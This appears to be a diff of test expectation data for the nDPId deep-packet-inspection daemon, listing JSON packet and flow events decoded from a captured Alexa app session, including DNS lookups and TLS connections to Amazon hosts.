00308{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":20,"pkt_type":6,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":20,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCAAYAAa+BAQA="} 00294{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":20,"pkt_type":6,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":20,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCAAYAAa+BAQA="}
00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":6,"global_ts_msec":1490976022526} 00184{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":6,"global_ts_msec":1490976022526}
00308{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":20,"pkt_type":6,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":20,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCAAYAAa+BAQA="} 00294{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":20,"pkt_type":6,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":20,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCAAYAAa+BAQA="}
00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":6,"global_ts_msec":1490976022526} 00184{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":6,"global_ts_msec":1490976022526}
00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490976022731,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490976022731,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"}
00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
@@ -207,8 +207,8 @@
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1490976043611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976043611,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WlZAAEARM16sECrYrBAqAalWADUAK0G7veEBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1490976043611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976043611,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WlZAAEARM16sECrYrBAqAalWADUAK0G7veEBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="}
00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976043612,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976043612,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"}
00204{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976043617} 00190{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976043617}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1490976043811,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976043811,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP0pFAAEARuxKsECoBrBAq2AA1qVYAO\/ZCveGBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAAbAARIFc6H"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1490976043811,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976043811,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP0pFAAEARuxKsECoBrBAq2AA1qVYAO\/ZCveGBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAAbAARIFc6H"}
00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -310,8 +310,8 @@
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"}
00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976048429,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976048429,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"}
00204{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976048620} 00190{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976048620}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="}
@@ -548,8 +548,8 @@
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"}
00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
